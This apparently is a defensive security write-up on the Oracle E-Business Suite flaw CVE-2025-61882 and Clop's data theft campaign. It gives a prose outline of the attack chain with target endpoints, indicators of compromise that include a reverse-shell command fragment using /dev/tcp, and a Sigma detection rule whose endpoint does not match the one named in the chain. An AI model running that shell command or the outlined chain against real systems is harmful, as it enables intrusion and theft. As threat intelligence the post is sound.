Oracle E-Business Suite Zero-Day Exploited in Clop Data Theft Attacks: CVE-2025–61882

Oracle has patched a critical zero-day vulnerability (#CVE-2025–61882) in Oracle E-Business Suite after the notorious Clop ransomware group exploited it in widespread data theft attacks. This unauthenticated remote code execution flaw carries a CVSS score of 9.8 and affects Oracle EBS versions 12.2.3 through 12.2.14.

Vulnerability Overview

CVE-2025–61882 resides in the BI Publisher Integration component of Oracle Concurrent Processing within Oracle E-Business Suite. The vulnerability allows unauthenticated attackers to remotely execute arbitrary code via HTTP/HTTPS without any user interaction. This flaw enables complete system compromise, including access to sensitive financial, HR, and customer data stored in these critical enterprise systems.

Timeline and Attribution

Security researchers have confirmed that Clop began exploiting this zero-day as early as August 9, 2025, approximately eight weeks before Oracle disclosed and patched the vulnerability. The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025–61882 to its Known Exploited Vulnerabilities catalog on October 6, 2025, noting its use in ransomware campaigns.

Charles Carmakal, CTO of Mandiant at Google Cloud, confirmed that “Clop has been exploiting multiple vulnerabilities in Oracle EBS since at least August 2025, stealing large amounts of data from several victims”. The group has been sending extortion emails to executives demanding ransoms in the seven to eight-figure range.

Technical Exploit Chain

Security researchers at watchTowr Labs reverse-engineered the exploit and discovered it involves a sophisticated five-stage attack chain:⁸⁶

1. Server-Side Request Forgery (SSRF): Attackers send crafted XML POST requests to /OA_HTML/configurator/UiServlet to force the backend server to make arbitrary HTTP requests

2. CRLF Injection: Malicious headers are injected into SSRF-triggered requests

3. Request Smuggling: HTTP persistent connections are exploited to chain multiple requests while reducing detection noise

4. Authentication Bypass: Administrative accounts are compromised through password reset vulnerabilities

5. Code Execution: Malicious XSLT templates are uploaded via XML Publisher Template Manager endpoints (/OA_HTML/RF.jsp and /OA_HTML/OA.jsp) to achieve remote code execution^13

Indicators of Compromise

Oracle’s security advisory provides specific IOCs from observed exploitation:

Malicious IP Addresses:

• 200.107.207[.]26

• 185.181.60[.]11

Suspicious Commands:

• sh -c /bin/bash -i >& /dev/tcp/ (reverse shell establishment)

File Hashes (SHA-256):

• 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d (exploit package)

• aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 (exp.py exploit script)

• 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b (server.py support script)

Sigma Detection Rule

Based on the technical analysis and attack patterns, here is a comprehensive Sigma rule for detecting CVE-2025–61882 exploitation attempts:

title: Oracle EBS CVE-2025-61882 Exploitation Attempt
id: 7b31b049-c803-4a93-a0b1-d4a2c9aafb09
status: experimental
description: |
 Detects potential exploitation attempts targeting Oracle E-Business Suite CVE-2025-61882 vulnerability in BI Publisher Integration.
references:
 - https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
 - https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/
 - https://www.crowdstrike.com/en-us/blog/crowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882/
author: Saiprashanth Pulisetti ( @0xPrashanthSec)
date: 2025-10-08
tags:
 - attack.initial-access
 - attack.execution
 - attack.t1190
 - attack.t1203
 - cve.2025-61882
 - detection.emerging-threats
logsource:
 category: webserver
detection:
 selection:
 cs-method: POST
 cs-uri-stem: /OA_HTML/SyncServlet
 condition: selection
falsepositives:
 - Legitimate BI Publisher report generation
level: medium

Impact and Business Risk

The exploitation of CVE-2025–61882 represents one of the most significant enterprise security threats of 2025. Oracle E-Business Suite serves as the backbone ERP system for thousands of major enterprises and government organizations worldwide, managing critical functions including:⁵

• Financial management and accounting

• Human resources and payroll

• Supply chain and procurement

• Customer relationship management

A successful compromise can lead to complete operational shutdown, massive data theft, regulatory violations, and multi-million dollar ransom demands.

Immediate Actions Required

1. Emergency Patching: Apply Oracle’s security update immediately for all EBS versions 12.2.3–12.2.14

2. IOC Hunting: Search for the provided indicators of compromise in network logs and system processes

3. Network Isolation: Remove Oracle EBS systems from internet exposure where possible

4. Threat Hunting: Deploy the provided Sigma rule and monitor for suspicious activity patterns

Long-term Security Improvements

Organizations should implement comprehensive monitoring for Oracle EBS environments, establish automated vulnerability management processes, and develop incident response procedures specific to ERP system compromises.

The rapid response from the security community, including Oracle, CISA, and threat intelligence firms, demonstrates the critical importance of coordinated vulnerability disclosure in protecting enterprise infrastructure from sophisticated adversaries like Clop.

Reference:

https://www.oracle.com/security-alerts/alert-cve-2025-61882.html

https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/?source=post_page-----73bff4e92545---------------------------------------